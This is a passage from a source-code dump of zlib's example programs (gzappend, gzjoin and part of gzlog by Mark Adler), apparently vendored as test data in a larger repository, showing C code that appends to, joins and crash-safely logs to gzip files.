available output */ do { strm->avail_out = CHUNK; strm->next_out = out; ret = deflate(strm, last && len == 0 ? Z_FINISH : Z_NO_FLUSH); left = CHUNK - strm->avail_out; while (left) { len = write(gd, out + CHUNK - strm->avail_out - left, left); if (len == -1) bye("writing gzip file", ""); left -= (unsigned)len; } } while (strm->avail_out == 0 && ret != Z_STREAM_END); } while (len != 0); /* write trailer after last entry */ if (last) { deflateEnd(strm); out[0] = (unsigned char)(strm->adler); out[1] = (unsigned char)(strm->adler >> 8); out[2] = (unsigned char)(strm->adler >> 16); out[3] = (unsigned char)(strm->adler >> 24); out[4] = (unsigned char)(strm->total_in); out[5] = (unsigned char)(strm->total_in >> 8); out[6] = (unsigned char)(strm->total_in >> 16); out[7] = (unsigned char)(strm->total_in >> 24); len = 8; do { ret = write(gd, out + 8 - len, len); if (ret == -1) bye("writing gzip file", ""); len -= ret; } while (len); close(gd); } /* clean up and return */ free(out); free(in); if (fd > 0) close(fd); } /* process the compression level option if present, scan the gzip file, and append the specified files, or append the data from stdin if no other file names are provided on the command line -- the gzip file must be writable and seekable */ int main(int argc, char **argv) { int gd, level; z_stream strm; /* ignore command name */ argc--; argv++; /* provide usage if no arguments */ if (*argv == NULL) { printf( "gzappend 1.2 (11 Oct 2012) Copyright (C) 2003, 2012 Mark Adler\n" ); printf( "usage: gzappend [-level] file.gz [ addthis [ andthis ... ]]\n"); return 0; } /* set compression level */ level = Z_DEFAULT_COMPRESSION; if (argv[0][0] == '-') { if (argv[0][1] < '0' || argv[0][1] > '9' || argv[0][2] != 0) bye("invalid compression level", ""); level = argv[0][1] - '0'; if (*++argv == NULL) bye("no gzip file name after options", ""); } /* prepare to append to gzip file */ gd = gzscan(*argv++, &strm, level); /* append files on command line, or from stdin if none */ if (*argv == NULL) gztack(NULL, gd, &strm, 1); else do { gztack(*argv, gd, &strm, argv[1] == NULL); } while (*++argv != NULL); return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gzjoin.c ================================================ /* gzjoin -- command to join gzip files into one gzip file Copyright (C) 2004, 2005, 2012 Mark Adler, all rights reserved version 1.2, 14 Aug 2012 This software is provided 'as-is', without any express or implied warranty. In no event will the author be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Mark Adler madler@alumni.caltech.edu */ /* * Change history: * * 1.0 11 Dec 2004 - First version * 1.1 12 Jun 2005 - Changed ssize_t to long for portability * 1.2 14 Aug 2012 - Clean up for z_const usage */ /* gzjoin takes one or more gzip files on the command line and writes out a single gzip file that will uncompress to the concatenation of the uncompressed data from the individual gzip files. gzjoin does this without having to recompress any of the data and without having to calculate a new crc32 for the concatenated uncompressed data. gzjoin does however have to decompress all of the input data in order to find the bits in the compressed data that need to be modified to concatenate the streams. gzjoin does not do an integrity check on the input gzip files other than checking the gzip header and decompressing the compressed data. They are otherwise assumed to be complete and correct. Each joint between gzip files removes at least 18 bytes of previous trailer and subsequent header, and inserts an average of about three bytes to the compressed data in order to connect the streams. The output gzip file has a minimal ten-byte gzip header with no file name or modification time. This program was written to illustrate the use of the Z_BLOCK option of inflate() and the crc32_combine() function. gzjoin will not compile with versions of zlib earlier than 1.2.3. */ #include /* fputs(), fprintf(), fwrite(), putc() */ #include /* exit(), malloc(), free() */ #include /* open() */ #include /* close(), read(), lseek() */ #include "zlib.h" /* crc32(), crc32_combine(), inflateInit2(), inflate(), inflateEnd() */ #define local static /* exit with an error (return a value to allow use in an expression) */ local int bail(char *why1, char *why2) { fprintf(stderr, "gzjoin error: %s%s, output incomplete\n", why1, why2); exit(1); return 0; } /* -- simple buffered file input with access to the buffer -- */ #define CHUNK 32768 /* must be a power of two and fit in unsigned */ /* bin buffered input file type */ typedef struct { char *name; /* name of file for error messages */ int fd; /* file descriptor */ unsigned left; /* bytes remaining at next */ unsigned char *next; /* next byte to read */ unsigned char *buf; /* allocated buffer of length CHUNK */ } bin; /* close a buffered file and free allocated memory */ local void bclose(bin *in) { if (in != NULL) { if (in->fd != -1) close(in->fd); if (in->buf != NULL) free(in->buf); free(in); } } /* open a buffered file for input, return a pointer to type bin, or NULL on failure */ local bin *bopen(char *name) { bin *in; in = malloc(sizeof(bin)); if (in == NULL) return NULL; in->buf = malloc(CHUNK); in->fd = open(name, O_RDONLY, 0); if (in->buf == NULL || in->fd == -1) { bclose(in); return NULL; } in->left = 0; in->next = in->buf; in->name = name; return in; } /* load buffer from file, return -1 on read error, 0 or 1 on success, with 1 indicating that end-of-file was reached */ local int bload(bin *in) { long len; if (in == NULL) return -1; if (in->left != 0) return 0; in->next = in->buf; do { len = (long)read(in->fd, in->buf + in->left, CHUNK - in->left); if (len < 0) return -1; in->left += (unsigned)len; } while (len != 0 && in->left < CHUNK); return len == 0 ? 1 : 0; } /* get a byte from the file, bail if end of file */ #define bget(in) (in->left ? 0 : bload(in), \ in->left ? (in->left--, *(in->next)++) : \ bail("unexpected end of file on ", in->name)) /* get a four-byte little-endian unsigned integer from file */ local unsigned long bget4(bin *in) { unsigned long val; val = bget(in); val += (unsigned long)(bget(in)) << 8; val += (unsigned long)(bget(in)) << 16; val += (unsigned long)(bget(in)) << 24; return val; } /* skip bytes in file */ local void bskip(bin *in, unsigned skip) { /* check pointer */ if (in == NULL) return; /* easy case -- skip bytes in buffer */ if (skip <= in->left) { in->left -= skip; in->next += skip; return; } /* skip what's in buffer, discard buffer contents */ skip -= in->left; in->left = 0; /* seek past multiples of CHUNK bytes */ if (skip > CHUNK) { unsigned left; left = skip & (CHUNK - 1); if (left == 0) { /* exact number of chunks: seek all the way minus one byte to check for end-of-file with a read */ lseek(in->fd, skip - 1, SEEK_CUR); if (read(in->fd, in->buf, 1) != 1) bail("unexpected end of file on ", in->name); return; } /* skip the integral chunks, update skip with remainder */ lseek(in->fd, skip - left, SEEK_CUR); skip = left; } /* read more input and skip remainder */ bload(in); if (skip > in->left) bail("unexpected end of file on ", in->name); in->left -= skip; in->next += skip; } /* -- end of buffered input functions -- */ /* skip the gzip header from file in */ local void gzhead(bin *in) { int flags; /* verify gzip magic header and compression method */ if (bget(in) != 0x1f || bget(in) != 0x8b || bget(in) != 8) bail(in->name, " is not a valid gzip file"); /* get and verify flags */ flags = bget(in); if ((flags & 0xe0) != 0) bail("unknown reserved bits set in ", in->name); /* skip modification time, extra flags, and os */ bskip(in, 6); /* skip extra field if present */ if (flags & 4) { unsigned len; len = bget(in); len += (unsigned)(bget(in)) << 8; bskip(in, len); } /* skip file name if present */ if (flags & 8) while (bget(in) != 0) ; /* skip comment if present */ if (flags & 16) while (bget(in) != 0) ; /* skip header crc if present */ if (flags & 2) bskip(in, 2); } /* write a four-byte little-endian unsigned integer to out */ local void put4(unsigned long val, FILE *out) { putc(val & 0xff, out); putc((val >> 8) & 0xff, out); putc((val >> 16) & 0xff, out); putc((val >> 24) & 0xff, out); } /* Load up zlib stream from buffered input, bail if end of file */ local void zpull(z_streamp strm, bin *in) { if (in->left == 0) bload(in); if (in->left == 0) bail("unexpected end of file on ", in->name); strm->avail_in = in->left; strm->next_in = in->next; } /* Write header for gzip file to out and initialize trailer. */ local void gzinit(unsigned long *crc, unsigned long *tot, FILE *out) { fwrite("\x1f\x8b\x08\0\0\0\0\0\0\xff", 1, 10, out); *crc = crc32(0L, Z_NULL, 0); *tot = 0; } /* Copy the compressed data from name, zeroing the last block bit of the last block if clr is true, and adding empty blocks as needed to get to a byte boundary. If clr is false, then the last block becomes the last block of the output, and the gzip trailer is written. crc and tot maintains the crc and length (modulo 2^32) of the output for the trailer. The resulting gzip file is written to out. gzinit() must be called before the first call of gzcopy() to write the gzip header and to initialize crc and tot. */ local void gzcopy(char *name, int clr, unsigned long *crc, unsigned long *tot, FILE *out) { int ret; /* return value from zlib functions */ int pos; /* where the "last block" bit is in byte */ int last; /* true if processing the last block */ bin *in; /* buffered input file */ unsigned char *start; /* start of compressed data in buffer */ unsigned char *junk; /* buffer for uncompressed data -- discarded */ z_off_t len; /* length of uncompressed data (support > 4 GB) */ z_stream strm; /* zlib inflate stream */ /* open gzip file and skip header */ in = bopen(name); if (in == NULL) bail("could not open ", name); gzhead(in); /* allocate buffer for uncompressed data and initialize raw inflate stream */ junk = malloc(CHUNK); strm.zalloc = Z_NULL; strm.zfree = Z_NULL; strm.opaque = Z_NULL; strm.avail_in = 0; strm.next_in = Z_NULL; ret = inflateInit2(&strm, -15); if (junk == NULL || ret != Z_OK) bail("out of memory", ""); /* inflate and copy compressed data, clear last-block bit if requested */ len = 0; zpull(&strm, in); start = in->next; last = start[0] & 1; if (last && clr) start[0] &= ~1; strm.avail_out = 0; for (;;) { /* if input used and output done, write used input and get more */ if (strm.avail_in == 0 && strm.avail_out != 0) { fwrite(start, 1, strm.next_in - start, out); start = in->buf; in->left = 0; zpull(&strm, in); } /* decompress -- return early when end-of-block reached */ strm.avail_out = CHUNK; strm.next_out = junk; ret = inflate(&strm, Z_BLOCK); switch (ret) { case Z_MEM_ERROR: bail("out of memory", ""); case Z_DATA_ERROR: bail("invalid compressed data in ", in->name); } /* update length of uncompressed data */ len += CHUNK - strm.avail_out; /* check for block boundary (only get this when block copied out) */ if (strm.data_type & 128) { /* if that was the last block, then done */ if (last) break; /* number of unused bits in last byte */ pos = strm.data_type & 7; /* find the next last-block bit */ if (pos != 0) { /* next last-block bit is in last used byte */ pos = 0x100 >> pos; last = strm.next_in[-1] & pos; if (last && clr) in->buf[strm.next_in - in->buf - 1] &= ~pos; } else { /* next last-block bit is in next unused byte */ if (strm.avail_in == 0) { /* don't have that byte yet -- get it */ fwrite(start, 1, strm.next_in - start, out); start = in->buf; in->left = 0; zpull(&strm, in); } last = strm.next_in[0] & 1; if (last && clr) in->buf[strm.next_in - in->buf] &= ~1; } } } /* update buffer with unused input */ in->left = strm.avail_in; in->next = in->buf + (strm.next_in - in->buf); /* copy used input, write empty blocks to get to byte boundary */ pos = strm.data_type & 7; fwrite(start, 1, in->next - start - 1, out); last = in->next[-1]; if (pos == 0 || !clr) /* already at byte boundary, or last file: write last byte */ putc(last, out); else { /* append empty blocks to last byte */ last &= ((0x100 >> pos) - 1); /* assure unused bits are zero */ if (pos & 1) { /* odd -- append an empty stored block */ putc(last, out); if (pos == 1) putc(0, out); /* two more bits in block header */ fwrite("\0\0\xff\xff", 1, 4, out); } else { /* even -- append 1, 2, or 3 empty fixed blocks */ switch (pos) { case 6: putc(last | 8, out); last = 0; case 4: putc(last | 0x20, out); last = 0; case 2: putc(last | 0x80, out); putc(0, out); } } } /* update crc and tot */ *crc = crc32_combine(*crc, bget4(in), len); *tot += (unsigned long)len; /* clean up */ inflateEnd(&strm); free(junk); bclose(in); /* write trailer if this is the last gzip file */ if (!clr) { put4(*crc, out); put4(*tot, out); } } /* join the gzip files on the command line, write result to stdout */ int main(int argc, char **argv) { unsigned long crc, tot; /* running crc and total uncompressed length */ /* skip command name */ argc--; argv++; /* show usage if no arguments */ if (argc == 0) { fputs("gzjoin usage: gzjoin f1.gz [f2.gz [f3.gz ...]] > fjoin.gz\n", stderr); return 0; } /* join gzip files on command line and write to stdout */ gzinit(&crc, &tot, stdout); while (argc--) gzcopy(*argv++, argc, &crc, &tot, stdout); /* done */ return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gzlog.c ================================================ /* * gzlog.c * Copyright (C) 2004, 2008, 2012, 2016, 2019 Mark Adler, all rights reserved * For conditions of distribution and use, see copyright notice in gzlog.h * version 2.3, 25 May 2019 */ /* gzlog provides a mechanism for frequently appending short strings to a gzip file that is efficient both in execution time and compression ratio. The strategy is to write the short strings in an uncompressed form to the end of the gzip file, only compressing when the amount of uncompressed data has reached a given threshold. gzlog also provides protection against interruptions in the process due to system crashes. The status of the operation is recorded in an extra field in the gzip file, and is only updated once the gzip file is brought to a valid state. The last data to be appended or compressed is saved in an auxiliary file, so that if the operation is interrupted, it can be completed the next time an append operation is attempted. gzlog maintains another auxiliary file with the last 32K of data from the compressed portion, which is preloaded for the compression of the subsequent data. This minimizes the impact to the compression ratio of appending. */ /* Operations Concept: Files (log name "foo"): foo.gz -- gzip file with the complete log foo.add -- last message to append or last data to compress foo.dict -- dictionary of the last 32K of data for next compression foo.temp -- temporary dictionary file for compression after this one foo.lock -- lock file for reading and writing the other files foo.repairs -- log file for log file recovery operations (not compressed) gzip file structure: - fixed-length (no file name) header with extra field (see below) - compressed data ending initially with empty stored block - uncompressed data filling out originally empty stored block and subsequent stored blocks as needed (16K max each) - gzip trailer - no junk at end (no other gzip streams) When appending data, the information in the first three items above plus the foo.add file are sufficient to recover an interrupted append operation. The extra field has the necessary information to restore the start of the last stored block and determine where to append the data in the foo.add file, as well as the crc and length of the gzip data before the append operation. The foo.add file is created before the gzip file is marked for append, and deleted after the gzip file is marked as complete. So if the append operation is interrupted, the data to add will still be there. If due to some external force, the foo.add file gets deleted between when the append operation was interrupted and when recovery is attempted, the gzip file will still be restored, but without the appended data. When compressing data, the information in the first two items above plus the foo.add file are sufficient to recover an interrupted compress operation. The extra field has the necessary information to find the end of the compressed data, and contains both the crc and length of just the compressed data and of the complete set of data including the contents of the foo.add file. Again, the foo.add file is maintained during the compress operation in case of an interruption. If in the unlikely event the foo.add file with the data to be compressed is missing due to some external force, a gzip file with just the previous compressed data will be reconstructed. In this case, all of the data that was to be compressed is lost (approximately one megabyte). This will not occur if all that happened was an interruption of the compress operation. The third state that is marked is the replacement of the old dictionary with the new dictionary after a compress operation. Once compression is complete, the gzip file is marked as being in the replace state. This completes the gzip file, so an interrupt after being so marked does not result in recompression. Then the dictionary file is replaced, and the gzip file is marked as completed. This state prevents the possibility of restarting compression with the wrong dictionary file. All three operations are wrapped by a lock/unlock procedure. In order to gain exclusive access to the log files, first a foo.lock file must be exclusively created. When all operations are complete, the lock is released by deleting the foo.lock file. If when attempting to create the lock file, it already exists and the modify time of the lock file is more than five minutes old (set by the PATIENCE define below), then the old lock file is considered stale and deleted, and the exclusive creation of the lock file is retried. To assure that there are no false assessments of the staleness of the lock file, the operations periodically touch the lock file to update the modified date. Following is the definition of the extra field with all of the information required to enable the above append and compress operations and their recovery if interrupted. Multi-byte values are stored little endian (consistent with the gzip format). File pointers are eight bytes long. The crc's and lengths for the gzip trailer are four bytes long. (Note that the length at the end of a gzip file is used for error checking only, and for large files is actually the length modulo 2^32.) The stored block length is two bytes long. The gzip extra field two-byte identification is "ap" for append. It is assumed that writing the extra field to the file is an "atomic" operation. That is, either all of the extra field is written to the file, or none of it is, if the operation is interrupted right at the point of updating the extra field. This is a reasonable assumption, since the extra field is within the first 52 bytes of the file, which is smaller than any expected block size for a mass storage device (usually 512 bytes or larger). Extra field (35 bytes): - Pointer to first stored block length -- this points to the two-byte length of the first stored block, which is followed by the two-byte, one's complement of that length. The stored block length is preceded by the three-bit header of the stored block, which is the actual start of the stored block in the deflate format. See the bit offset field below. - Pointer to the last stored block length. This is the same as above, but for the last stored block of the uncompressed data in the gzip file. Initially this is the same as the first stored block length pointer. When the stored block gets to 16K (see the MAX_STORE define), then a new stored block as added, at which point the last stored block length pointer is different from the first stored block length pointer. When they are different, the first bit of the last stored block header is eight bits, or one byte back from the block length. - Compressed data crc and length. This is the crc and length of the data that is in the compressed portion of the deflate stream. These are used only in the event that the foo.add file containing the data to compress is lost after a compress operation is interrupted. - Total data crc and length. This is the crc and length of all of the data stored in the gzip file, compressed and uncompressed. It is used to reconstruct the gzip trailer when compressing, as well as when recovering interrupted operations. - Final stored block length. This is used to quickly find where to append, and allows the restoration of the original final stored block state when an append operation is interrupted. - First stored block start as the number of bits back from the final stored block first length byte. This value is in the range of 3..10, and is stored as the low three bits of the final byte of the extra field after subtracting three (0..7). This allows the last-block bit of the stored block header to be updated when a new stored block is added, for the case when the first stored block and the last stored block are the same. (When they are different, the numbers of bits back is known to be eight.) This also allows for new compressed data to be appended to the old compressed data in the compress operation, overwriting the previous first stored block, or for the compressed data to be terminated and a valid gzip file reconstructed on the off chance that a compression operation was interrupted and the data to compress in the foo.add file was deleted. - The operation in process. This is the next two bits in the last byte (the bits under the mask 0x18). The are interpreted as 0: nothing in process, 1: append in process, 2: compress in process, 3: replace in process. - The top three bits of the last byte in the extra field are reserved and are currently set to zero. Main procedure: - Exclusively create the foo.lock file using the O_CREAT and O_EXCL modes of the system open() call. If the modify time of an existing lock file is more than PATIENCE seconds old, then the lock file is deleted and the exclusive create is retried. - Load the extra field from the foo.gz file, and see if an operation was in progress but not completed. If so, apply the recovery procedure below. - Perform the append procedure with the provided data. - If the uncompressed data in the foo.gz file is 1MB or more, apply the compress procedure. - Delete the foo.lock file. Append procedure: - Put what to append in the foo.add file so that the operation can be restarted if this procedure is interrupted. - Mark the foo.gz extra field with the append operation in progress. + Restore the original last-block bit and stored block length of the last stored block from the information in the extra field, in case a previous append operation was interrupted. - Append the provided data to the last stored block, creating new stored blocks as needed and updating the stored blocks last-block bits and lengths. - Update the crc and length with the new data, and write the gzip trailer. - Write over the extra field (with a single write operation) with the new pointers, lengths, and crc's, and mark the gzip file as not in process. Though there is still a foo.add file, it will be ignored since nothing is in process. If a foo.add file is leftover from a previously completed operation, it is truncated when writing new data to it. - Delete the foo.add file. Compress and replace procedures: - Read all of the uncompressed data in the stored blocks in foo.gz and write it to foo.add. Also write foo.temp with the last 32K of that data to provide a dictionary for the next invocation of this procedure. - Rewrite the extra field marking foo.gz with a compression in process. * If there is no data provided to compress (due to a missing foo.add file when recovering), reconstruct and truncate the foo.gz file to contain only the previous compressed data and proceed to the step after the next one. Otherwise ... - Compress the data with the dictionary in foo.dict, and write to the foo.gz file starting at the bit immediately following the last previously compressed block. If there is no foo.dict, proceed anyway with the compression at slightly reduced efficiency. (For the foo.dict file to be missing requires some external failure beyond simply the interruption of a compress operation.) During this process, the foo.lock file is periodically touched to assure that that file is not considered stale by another process before we're done. The deflation is terminated with a non-last empty static block (10 bits long), that is then located and written over by a last-bit-set empty stored block. - Append the crc and length of the data in the gzip file (previously calculated during the append operations). - Write over the extra field with the updated stored block offsets, bits back, crc's, and lengths, and mark foo.gz as in process for a replacement of the dictionary. @ Delete the foo.add file. - Replace foo.dict with foo.temp. - Write over the extra field, marking foo.gz as complete. Recovery procedure: - If not a replace recovery, read in the foo.add file, and provide that data to the appropriate recovery below. If there is no foo.add file, provide a zero data length to the recovery. In that case, the append recovery restores the foo.gz to the previous compressed + uncompressed data state. For the the compress recovery, a missing foo.add file results in foo.gz being restored to the previous compressed-only data state. - Append recovery: - Pick up append at + step above - Compress recovery: - Pick up compress at * step above - Replace recovery: - Pick up compress at @ step above - Log the repair with a date stamp in foo.repairs */ #include #include /* rename, fopen, fprintf, fclose */ #include /* malloc, free */ #include /* strlen, strrchr, strcpy, strncpy, strcmp */ #include /* open */ #include /* lseek, read, write, close, unlink, sleep, */ /* ftruncate, fsync */ #include /* errno */ #include /* time, ctime */ #include /* stat */ #include /* utimes */ #include "zlib.h" /* crc32 */ #include "gzlog.h" /* header for external access */ #define local static typedef unsigned int uint; typedef unsigned long ulong; /* Macro for debugging to deterministically force recovery operations */ #ifdef GZLOG_DEBUG #include /* longjmp */ jmp_buf gzlog_jump; /* where to go back to */ int gzlog_bail = 0; /* which point to bail at (1..8) */ int gzlog_count = -1; /* number of times through to wait */ # define BAIL(n) do { if (n == gzlog_bail && gzlog_count-- == 0) \ longjmp(gzlog_jump, gzlog_bail); } while (0) #else # define BAIL(n) #endif /* how old the lock file can be in seconds before considering it stale */ #define PATIENCE 300 /* maximum stored block size in Kbytes -- must be in 1..63 */ #define MAX_STORE 16 /* number of stored Kbytes to trigger compression (must be >= 32 to allow dictionary construction, and <= 204 * MAX_STORE, in order for >> 10 to discard the stored block headers contribution of five bytes each) */ #define TRIGGER 1024 /* size of a deflate dictionary (this cannot be changed) */ #define DICT 32768U /* values for the operation (2 bits) */ #define NO_OP 0 #define APPEND_OP 1 #define COMPRESS_OP 2 #define REPLACE_OP 3 /* macros to extract little-endian integers from an unsigned byte buffer */ #define PULL2(p) ((p)[0]+((uint)((p)[1])<<8)) #define PULL4(p) (PULL2(p)+((ulong)PULL2(p+2)<<16)) #define PULL8(p) (PULL4(p)+((off_t)PULL4(p+4)<<32)) /* macros to store integers into a byte buffer in little-endian order */ #define PUT2(p,a) do {(p)[0]=a;(p)[1]=(a)>>8;} while(0) #define PUT4(p,a) do {PUT2(p,a);PUT2(p+2,a>>16);} while(0) #define PUT8(p,a) do {PUT4(p,a);PUT4(p+4,a>>32);} while(0) /* internal structure for log information */ #define LOGID "\106\035\172" /* should be three non-zero characters */ struct log { char id[4]; /* contains LOGID to detect inadvertent overwrites */ int fd; /* file descriptor for .gz file, opened read/write */ char *path; /* allocated path, e.g. "/var/log/foo" or "foo" */ char *end; /* end of path, for appending suffices such as ".gz" */ off_t first; /* offset of first stored block first length byte */ int back; /* location of first block id in bits back from first */ uint stored; /* bytes currently in last stored block */ off_t last; /* offset of last stored block first length byte */ ulong ccrc; /* crc of compressed data */ ulong clen; /* length (modulo 2^32) of compressed data */ ulong tcrc; /* crc of total data */ ulong tlen; /* length (modulo 2^32) of total data */ time_t lock; /* last modify time of our lock file */ }; /* gzip header for gzlog */ local unsigned char log_gzhead[] = { 0x1f, 0x8b, /* magic gzip id */ 8, /* compression method is deflate */ 4, /* there is an extra field (no file name) */ 0, 0, 0, 0, /* no modification time provided */ 0, 0xff, /* no extra flags, no OS specified */ 39, 0, 'a', 'p', 35, 0 /* extra field with "ap" subfield */ /* 35 is EXTRA, 39 is EXTRA + 4 */ }; #define HEAD sizeof(log_gzhead) /* should be 16 */ /* initial gzip extra field content (52 == HEAD + EXTRA + 1) */ local unsigned char log_gzext[] = { 52, 0, 0, 0, 0, 0, 0, 0, /* offset of first stored block length */ 52, 0, 0, 0, 0, 0, 0, 0, /* offset of last stored block length */ 0, 0, 0, 0, 0, 0, 0, 0, /* compressed data crc and length */ 0, 0, 0, 0, 0, 0, 0, 0, /* total data crc and length */ 0, 0, /* final stored block data length */ 5 /* op is NO_OP, last bit 8 bits back */ }; #define EXTRA sizeof(log_gzext) /* should be 35 */ /* initial gzip data and trailer */ local unsigned char log_gzbody[] = { 1, 0, 0, 0xff, 0xff, /* empty stored block (last) */ 0, 0, 0, 0, /* crc */ 0, 0, 0, 0 /* uncompressed length */ }; #define BODY sizeof(log_gzbody) /* Exclusively create foo.lock in order to negotiate exclusive access to the foo.* files. If the modify time of an existing lock file is greater than PATIENCE seconds in the past, then consider the lock file to have been abandoned, delete it, and try the exclusive create again. Save the lock file modify time for verification of ownership. Return 0 on success, or -1 on failure, usually due to an access restriction or invalid path. Note that if stat() or unlink() fails, it may be due to another process noticing the abandoned lock file a smidge sooner and deleting it, so those are not flagged as an error. */ local int log_lock(struct log *log) { int fd; struct stat st; strcpy(log->end, ".lock"); while ((fd = open(log->path, O_CREAT | O_EXCL, 0644)) < 0) { if (errno != EEXIST) return -1; if (stat(log->path, &st) == 0 && time(NULL) - st.st_mtime > PATIENCE) { unlink(log->path); continue; } sleep(2); /* relinquish the CPU for two seconds while waiting */ } close(fd); if (stat(log->path, &st) == 0) log->lock = st.st_mtime; return 0; } /* Update the modify time of the lock file to now, in order to prevent another task from thinking that the lock is stale. Save the lock file modify time for verification of ownership. */ local void log_touch(struct log *log) { struct stat st; strcpy(log->end, ".lock"); utimes(log->path, NULL); if (stat(log->path, &st) == 0) log->lock = st.st_mtime; } /* Check the log file modify time against what is expected. Return true if this is not our lock. If it is our lock, touch it to keep it. */ local int log_check(struct log *log) { struct stat st; strcpy(log->end, ".lock"); if (stat(log->path, &st) || st.st_mtime != log->lock) return 1; log_touch(log); return 0; } /* Unlock a previously acquired lock, but only if it's ours. */ local void log_unlock(struct log *log) { if (log_check(log)) return; strcpy(log->end, ".lock"); unlink(log->path); log->lock = 0; } /* Check the gzip header and read in the extra field, filling in the values in the log structure. Return op on success or -1 if the gzip header was not as expected. op is the current operation in progress last written to the extra field. This assumes that the gzip file has already been opened, with the file descriptor log->fd. */ local int log_head(struct log *log) { int op; unsigned char buf[HEAD + EXTRA]; if (lseek(log->fd, 0, SEEK_SET) < 0 || read(log->fd, buf, HEAD + EXTRA) != HEAD + EXTRA || memcmp(buf, log_gzhead, HEAD)) { return -1; } log->first = PULL8(buf + HEAD); log->last = PULL8(buf + HEAD + 8); log->ccrc = PULL4(buf + HEAD + 16); log->clen = PULL4(buf + HEAD + 20); log->tcrc = PULL4(buf + HEAD + 24); log->tlen = PULL4(buf + HEAD + 28); log->stored = PULL2(buf + HEAD + 32); log->back = 3 + (buf[HEAD + 34] & 7); op = (buf[HEAD + 34] >> 3) & 3; return op; } /* Write over the extra field contents, marking the operation as op. Use fsync to assure that the device is written to, and in the requested order. This operation, and only this operation, is assumed to be atomic in order to assure that the log is recoverable in the event of an interruption at any point in the process. Return -1 if the write to foo.gz failed. */ local int log_mark(struct log *log, int op) { int ret; unsigned char ext[EXTRA]; PUT8(ext, log->first); PUT8(ext + 8, log->last); PUT4(ext + 16, log->ccrc); PUT4(ext + 20, log->clen); PUT4(ext + 24, log->tcrc); PUT4(ext + 28, log->tlen); PUT2(ext + 32, log->stored); ext[34] = log->back - 3 + (op << 3); fsync(log->fd); ret = lseek(log->fd, HEAD, SEEK_SET) < 0 || write(log->fd, ext, EXTRA) != EXTRA ? -1 : 0; fsync(log->fd); return ret; } /* Rewrite the last block header bits and subsequent zero bits to get to a byte boundary, setting the last block bit if last is true, and then write the remainder of the stored block header (length and one's complement). Leave the file pointer after the end of the last stored block data. Return -1 if there is a read or write failure on the foo.gz file */ local int log_last(struct log *log, int last) { int back, len, mask; unsigned char buf[6]; /* determine the locations of the bytes and bits to modify */ back = log->last == log->first ? log->back : 8; len = back > 8 ? 2 : 1; /* bytes back from log->last */ mask = 0x80 >> ((back - 1) & 7); /* mask for block last-bit */ /* get the byte to modify (one or two back) into buf[0] -- don't need to read the byte if the last-bit is eight bits back, since in that case the entire byte will be modified */ buf[0] = 0; if (back != 8 && (lseek(log->fd, log->last - len, SEEK_SET) < 0 || read(log->fd, buf, 1) != 1)) return -1; /* change the last-bit of the last stored block as requested -- note that all bits above the last-bit are set to zero, per the type bits of a stored block being 00 and per the convention that the bits to bring the stream to a byte boundary are also zeros */ buf[1] = 0; buf[2 - len] = (*buf & (mask - 1)) + (last ? mask : 0); /* write the modified stored block header and lengths, move the file pointer to after the last stored block data */ PUT2(buf + 2, log->stored); PUT2(buf + 4, log->stored ^ 0xffff); return lseek(log->fd, log->last - len, SEEK_SET) < 0 || write(log->fd, buf + 2 - len, len + 4) != len + 4 || lseek(log->fd, log->stored, SEEK_CUR) < 0 ? -1 : 0; } /* Append len bytes from data to the locked and open log file. len may be zero if recovering and no .add file was found. In that case, the previous state of the foo.gz file is restored. The data is appended uncompressed in deflate stored blocks. Return -1 if there was an error reading or writing the foo.gz file. */ local int log_append(struct log *log, unsigned char *data, size_t len) { uint put; off_t end; unsigned char buf[8]; /* set the last block last-bit and length, in case recovering an interrupted append, then position the file pointer to append to the block */ if (log_last(log, 1)) return -1; /* append, adding stored blocks and updating the offset of the last stored block as needed, and update the total crc and length */ while (len) { /* append as much as we can to the last block */ put = (MAX_STORE << 10) - log->stored; if (put > len) put = (uint)len; if (put) { if (write(log->fd, data, put) != put) return -1; BAIL(1); log->tcrc = crc32(log->tcrc, data, put); log->tlen += put; log->stored += put; data += put; len -= put; } /* if we need to, add a new empty stored block */ if (len) { /* mark current block as not last */ if (log_last(log, 0)) return -1; /* point to new, empty stored block */ log->last += 4 + log->stored + 1; log->stored = 0; } /* mark last block as last, update its length */ if (log_last(log, 1)) return -1; BAIL(2); } /* write the new crc and length trailer, and truncate just in case (could be recovering from partial append with a missing foo.add file) */ PUT4(buf, log->tcrc); PUT4(buf + 4, log->tlen); if (write(log->fd, buf, 8) != 8 || (end = lseek(log->fd, 0, SEEK_CUR)) < 0 || ftruncate(log->fd, end)) return -1; /* write the extra field, marking the log file as done, delete .add file */ if (log_mark(log, NO_OP)) return -1; strcpy(log->end, ".add"); unlink(log->path); /* ignore error, since may not exist */ return 0; } /* Replace the foo.dict file with the foo.temp file. Also delete the foo.add file, since the compress operation may have been interrupted before that was done. Returns 1 if memory could not be allocated, or -1 if reading or writing foo.gz fails, or if the rename fails for some reason other than foo.temp not existing. foo.temp not existing is a permitted error, since the replace operation may have been interrupted after the rename is done, but before foo.gz is marked as complete. */ local int log_replace(struct log *log) { int ret; char *dest; /* delete foo.add file */ strcpy(log->end, ".add"); unlink(log->path); /* ignore error, since may not exist */ BAIL(3); /* rename foo.name to foo.dict, replacing foo.dict if it exists */ strcpy(log->end, ".dict"); dest = malloc(strlen(log->path) + 1); if (dest == NULL) return -2; strcpy(dest, log->path); strcpy(log->end, ".temp"); ret = rename(log->path, dest); free(dest); if (ret && errno != ENOENT) return -1; BAIL(4); /* mark the foo.gz file as done */ return log_mark(log, NO_OP); } /* Compress the len bytes at data and append the compressed data to the foo.gz deflate data immediately after the previous compressed data. This overwrites the previous uncompressed data, which was stored in foo.add and is the data provided in data[0..len-1]. If this operation is interrupted, it picks up at the start of this routine, with the foo.add file read in again. If there is no data to compress (len == 0), then we simply terminate the foo.gz file after the previously compressed data, appending a final empty stored block and the gzip trailer. Return -1 if reading or writing the log.gz file failed, or -2 if there was a memory allocation failure. */ local int log_compress(struct log *log, unsigned char *data, size_t len) { int fd; uint got, max; ssize_t dict; off_t end; z_stream strm; unsigned char buf[DICT]; /* compress and 